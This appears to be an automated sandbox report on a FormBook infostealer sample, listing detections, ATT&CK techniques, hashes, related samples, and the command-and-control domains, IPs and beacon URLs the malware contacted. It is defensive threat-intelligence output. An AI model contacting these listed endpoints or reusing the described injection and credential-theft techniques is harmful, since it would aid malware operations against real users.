Source: C:\Users\user\Desktop\CSA73881.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\CSA73881.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	Path Interception	712 Process Injection	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	31 Virtualization/Sandbox Evasion	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	712 Process Injection	LSA Secrets	112 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CSA73881.exe	100%	Avira	HEUR/AGEN.1232160
CSA73881.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
14.0.InstallUtil.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
0.0.CSA73881.exe.de0000.0.unpack	100%	Avira	HEUR/AGEN.1232160		Download File

Domains

Source	Detection	Scanner	Link
www.browardhomeappraisal.com	7%	Virustotal	Browse
www.comgmaik.com	2%	Virustotal	Browse
segurambiental.com	9%	Virustotal	Browse
www.segurambiental.com	6%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.segurambiental.com/mh76/?Axo=j8MnV1AauDvQLYEDQHkxR7wEsLuzS8wOqoRJGUEtb1NYKXHLD1QrWCJCw/4m9jwcj9zX&e0Dd=gPHX06	0%	Avira URL Cloud	safe
www.northpierangling.info/mh76/	100%	Avira URL Cloud	malware
http://google.com)Exvkpxtvtblcdcgising7Uvadca.Properties.Resources	0%	Avira URL Cloud	safe
http://ww38.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLz	0%	Avira URL Cloud	safe
http://www.browardhomeappraisal.com/mh76/?Axo=ZKvJ8T01Uu5swSUTolvzZP3eEu33eLq9PUpXuYL3kSIE+YGu43QnDiKj3vyinvzv5HiX&e0Dd=gPHX06	0%	Avira URL Cloud	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
http://www.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.browardhomeappraisal.com	75.2.26.18	true	true	7%, Virustotal, Browse	unknown
www.comgmaik.com	103.224.182.210	true	true	2%, Virustotal, Browse	unknown
segurambiental.com	34.102.136.180	true	false	9%, Virustotal, Browse	unknown
www.segurambiental.com	unknown	unknown	true	6%, Virustotal, Browse	unknown
www.esrfy.xyz	unknown	unknown	true		unknown
www.merendri.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.segurambiental.com/mh76/?Axo=j8MnV1AauDvQLYEDQHkxR7wEsLuzS8wOqoRJGUEtb1NYKXHLD1QrWCJCw/4m9jwcj9zX&e0Dd=gPHX06	false	Avira URL Cloud: safe	unknown
www.northpierangling.info/mh76/	true	Avira URL Cloud: malware	low
http://www.browardhomeappraisal.com/mh76/?Axo=ZKvJ8T01Uu5swSUTolvzZP3eEu33eLq9PUpXuYL3kSIE+YGu43QnDiKj3vyinvzv5HiX&e0Dd=gPHX06	true	Avira URL Cloud: safe	unknown
http://www.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.nuget.org/packages/Newtonsoft.Json.Bson	CSA73881.exe, 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp	false		high
http://google.com)Exvkpxtvtblcdcgising7Uvadca.Properties.Resources	CSA73881.exe, 00000000.00000000.240713040.0000000000DE2000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	low
http://ww38.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLz	control.exe, 0000001C.00000002.776382935.00000000056CF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://google.com	CSA73881.exe, 00000000.00000002.314006871.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://james.newtonking.com/projects/json	CSA73881.exe, 00000000.00000002.315860973.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.314521039.00000000032FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.newtonsoft.com/jsonschema	CSA73881.exe, 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.102.136.180	segurambiental.com	United States	15169	GOOGLEUS	false
103.224.182.210	www.comgmaik.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
75.2.26.18	www.browardhomeappraisal.com	United States	16509	AMAZON-02US	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	680378
Start date and time: 08/08/202214:24:10	2022-08-08 14:24:10 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CSA73881.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/1@5/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 93.6% (good quality ratio 81.7%) Quality average: 71.9% Quality standard deviation: 33.3%
HCA Information:	Successful, ratio: 92% Number of executed functions: 130 Number of non-executed functions: 156
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.224.182.210	SecuriteInfo.com.W32.AIDetect.malware2.32576.exe	Get hash	malicious	Browse	www.orimifukasawa.xyz/uo5b/?-ZI4Dt=tWpqUNk/3vIryQFGE6zDNHYOFFOlgqvbHII9oHFduIBrBB9O5sCYir/KvOFi2kFB/dsXdPJgv4Wswq4TDRHdVThn+J8bzJyOQe1YPJaQz462&XDHP=eBZL
	july RFQ_PDF.vbs	Get hash	malicious	Browse	www.f1nn.site/fs92/
	MV MASTER.exe	Get hash	malicious	Browse	www.deathdate.biz/m02u/?5jBp=jlqPT5pQABck6ZASAslMo8xP1NCZHz5ECb2zY26lcC2tK+goi9849KzRhHrazz7qSeoN&7ndHLd=V8Oh
	Tender for Operating Table kenya.vbs	Get hash	malicious	Browse	www.flatpanleshd.com/n6ef/
	Tender RFQ 0092821.vbs	Get hash	malicious	Browse	www.flatpanleshd.com/n6ef/
	SecuriteInfo.com.W32.AIDetectNet.01.7003.exe	Get hash	malicious	Browse	www.0988259509.com/p0et/?q48=9rAhJr8H&6lQl7db0=zuYZePzaaSKVlCU2Klgmr5aVatOUxrfjzfcZn8MZ/NT7vJQFhujF5q55KooxFhyIp0cD
	General Terms and Conditions for Purchase-pdf.exe	Get hash	malicious	Browse	www.net-info.club/u808/?oTtDU=FuwdcVhVFM8AqmJ7ID0JGQUhXOHyon7mZHxxgl24dnRFMLAEd+E/E69Is6LyN0PcpuP7&8ppx=1bKd3zE0ft
	RFQ.com	Get hash	malicious	Browse	www.deathdate.biz/m02u/?n2JtNd=jlqPT5pQABck6ZASAslMo8xP1NCZHz5ECb2zY26lcC2tK+goi9849KzRhHrazz7qSeoN&8p=h6FlKNO8ddQHfbf
	Requisition.com	Get hash	malicious	Browse	www.deathdate.biz/m02u/?3fF=jlqPT5pQABck6ZASAslMo8xP1NCZHz5ECb2zY26lcC2tK+goi9849KzRhHrazz7qSeoN&BZfXVf=0ljPQ
	DOCUMENTS.exe	Get hash	malicious	Browse	www.machslicedbread.xyz/sdzp/?5j=qesVcp3pAF9ihGmF9xiljhzSpBCqcrwaVnXTcrGFmi90NiMipB7tCM6Py6P5fHYoFgQo&z2MH=lTh8q86PL
	w.exe	Get hash	malicious	Browse	www.pecwi67.store/oecd/?R49PSva=tIZcFLaVBSk5Q4U5Ub++he0eND0z37nKQbCWOH4bs/QRFl58Df6zaiEBE5SULOy4NoXe&p48d=AdQpJzTHf
	Nova ozljeda 034245627782.DOC.exe	Get hash	malicious	Browse	www.drimev.com/euv4/?3f=v4MdxpN0hKlE64mcAPRB7QyTm8baEOUbrFsrnmQTQZ0/Vvs6taQIqDlbrdkJNF+sESZz&jL3=0bgXdr
	TT COPY.js	Get hash	malicious	Browse	www.chacexupa.pro/rqbo/?ov=0bp0D&i6APkH8=hqaZXZ/C/HhHxzJUBB0nXx7Mxs3VC4Rdd4VcBdjxT8PMGxqLDrPvoPfVpnBt0eGVbp3J
	VEL5YUpqA3.exe	Get hash	malicious	Browse	www.0988259509.com/p0et/?2dQPLrP=zuYZePzaaSKVlCU2Klgmr5aVatOUxrfjzfcZn8MZ/NT7vJQFhujF5q55KrIhKAiw3R1E&bPzt=SpTHI
	bbUY6wLzeM.exe	Get hash	malicious	Browse	www.0988259509.com/p0et/?AXPlqZx=zuYZePzaaSKVlCU2Klgmr5aVatOUxrfjzfcZn8MZ/NT7vJQFhujF5q55KrEhZQuzuB1SLQXOhA==&06At=B8FP3lB0idgTXn_p
	COl9lXc3d3.exe	Get hash	malicious	Browse	www.homfromschoolfilm.com/a30z/?tPW=RVjdB4Z86lET_l&ERS8=yuIYCPIIHbECGio9kKFCz2Cz+V99drPsiTSNROHZp1NRqGOTzaDsFSaaPll4ZgXqKckL
	6cX2iGo2IB.exe	Get hash	malicious	Browse	www.businessetreussite.com/s2m0/?c2J8V=I7aq0eZZHC/y4p3w4JnfwCM8uZhJVayqwxsTIuT3exFUByVvu+x6AUuR0gqhpDFKPccu&oBZ8=5juLxHN0ChutmH7
	DHL Receipt Document,pdf.exe	Get hash	malicious	Browse	www.4club.supplies/mwfc/?DXl=rKt47p4dIRdQyFtZ1goXkqVrTLTjcafWR3ADQUP/d87S174EefIT+OpN47Iy6jhhd+Ba&7nO=_6A8b8_p7RhDCDEP
	New TST_SAM_16L SNAP WHITE.exe	Get hash	malicious	Browse	www.lliao.net/k9so/?3fihL=cokkGtggHPy8khOoNcepDyAfm/au/2eZ6pI/wVhabrSnMC7F5cGBPCs/ZwWdans56lJA&PFN=6l-XqfQ8
	K9p17DJWLu.exe	Get hash	malicious	Browse	www.nhentayi.net/wesd/?Zl=vVfTS&9r=Kzcrk/wjTh1iIMpxrhJfzFeJ1XRFEAEegockYHWg5jhpurJQA6Fdlc7Tlf/AF0Wh2/fM

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.browardhomeappraisal.com	issu 06042022.exe	Get hash	malicious	Browse	75.2.26.18

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TRELLIAN-AS-APTrellianPtyLimitedAU	3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe	Get hash	malicious	Browse	103.224.212.220
	Versanddetails.exe	Get hash	malicious	Browse	103.224.182.242
	FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exe	Get hash	malicious	Browse	103.224.212.220
	40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe	Get hash	malicious	Browse	103.224.212.220
	6A42F7E5290BF7E40E1AA0C0E9CEDA098A612D6DDA9B7.exe	Get hash	malicious	Browse	103.224.212.220
	CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe	Get hash	malicious	Browse	103.224.212.220
	7287980C1AFB840A7438471126C0C95C36FEFA79A013F.exe	Get hash	malicious	Browse	103.224.212.220
	zapytanie ofertowe09356.exe	Get hash	malicious	Browse	103.224.212.221
	yuUeum2cpl.exe	Get hash	malicious	Browse	103.224.212.219
	zH4aQ6xq4y.exe	Get hash	malicious	Browse	103.224.182.242
	Versanddetails.exe	Get hash	malicious	Browse	103.224.182.242
	Invoice & Shipment Documents.exe	Get hash	malicious	Browse	103.224.212.221
	SKM_20220108.exe	Get hash	malicious	Browse	103.224.182.242
	IMG-20022891.exe	Get hash	malicious	Browse	103.224.182.242
	DHL_AWB_NO#907853880911.exe	Get hash	malicious	Browse	103.224.212.221
	CFCAB36F73560B2D15B6C266FEAAF0195A6E0D18C22AA.exe	Get hash	malicious	Browse	103.224.182.208
	http://vicspublic.cjcc.ga.gov	Get hash	malicious	Browse	103.224.182.253
	http://vicspublic.cjcc.ga.gov	Get hash	malicious	Browse	103.224.182.253
	PO202202AG7.exe	Get hash	malicious	Browse	103.224.212.222
	Zahlung.exe	Get hash	malicious	Browse	103.224.182.242
AMAZON-02US	3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe	Get hash	malicious	Browse	75.2.60.5
	RHWrDPy2Wx	Get hash	malicious	Browse	18.227.210.30
	Dettagli della spedizione.exe	Get hash	malicious	Browse	3.67.141.185
	EPoAldgHwr	Get hash	malicious	Browse	35.74.235.103
	botx.mpsl	Get hash	malicious	Browse	54.67.203.13
	botx.arm7	Get hash	malicious	Browse	184.79.188.90
	botx.arm	Get hash	malicious	Browse	63.34.222.253
	Purchase Inquiry_pdf.ppa	Get hash	malicious	Browse	104.192.141.1
	Purchase Inquiry_pdf.ppa	Get hash	malicious	Browse	104.192.141.1
	AjQD72J13I	Get hash	malicious	Browse	69.169.232.186
	j4SGb5BB2X.exe	Get hash	malicious	Browse	3.124.142.205
	8oiogN6lXH.exe	Get hash	malicious	Browse	13.229.3.203
	qttSbmtUS9	Get hash	malicious	Browse	18.155.170.96
	lb6JhBXX45	Get hash	malicious	Browse	44.239.148.236
	B1kefW3SOZ	Get hash	malicious	Browse	35.78.114.162
	qzi0WDFB76.exe	Get hash	malicious	Browse	18.192.31.165
	jVkArWMQvf.x86	Get hash	malicious	Browse	54.104.203.163
	qjlrWFSPwd.arm	Get hash	malicious	Browse	54.119.199.1
	DMHAGjMTWB.exe	Get hash	malicious	Browse	52.28.247.255
	http://www.restoro.com	Get hash	malicious	Browse	65.9.191.226

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CSA73881.exe.log

Download File

Process:	C:\Users\user\Desktop\CSA73881.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1537
Entropy (8bit):	5.3478589519339295
Encrypted:	false
SSDEEP:	48:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzvFHLHKdHKBqHKs:Pq5qXEwCYqhQnoPtIxHeqzNrqdq4qs
MD5:	F6D3657BD1FBEF54E7F7BACB2497E327
SHA1:	A0A712015C242DCC28B69CDF567F594627C9CFA0
SHA-256:	5B16B4A3E65F04484B12171163A2A739409FA7F8C3D69BF9BAD961618D973301
SHA-512:	0231195A111259A3AA48526DCBEA98394099794C710C3FB8E0E12E2B4D30C60FB4064F7F4F671866FB0D94585E23B73C1270440242B25DA60CCFFA82B0B74306
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.138316897620068
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	CSA73881.exe
File size:	2187264
MD5:	3ed3236517a40602d654555bc912d926
SHA1:	16dc042b543fe473703e711844f508d353d6d6af
SHA256:	3702b6cfa76e492d56bd9da5f99f7ff805e32c16b3840ee66bb13a812f5d3155
SHA512:	05c6c1d72929e8221522452ce757467a05b07a6e6a8a85ef6f0f16f8dc052068fdb54636f8526dd0eeea7c9fe743dcc4eba6fb84f36cc4a3bbc82b7d057f93d2
SSDEEP:	49152:lYnRpC+ONzKBm/z2DhChFGTbQAbW0S748:lKRpjON1KbZbWH48
TLSH:	48A57C3169562B8B60317CCB841A669FEF717D61DB3240794DB3192B3D228B384FA637
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g..b..............0..R!..........q!.. ........@.. ........................!...........`................................

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x6171ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62F0C767 [Mon Aug 8 08:20:55 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x217154	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x218000	0xa00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x21a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

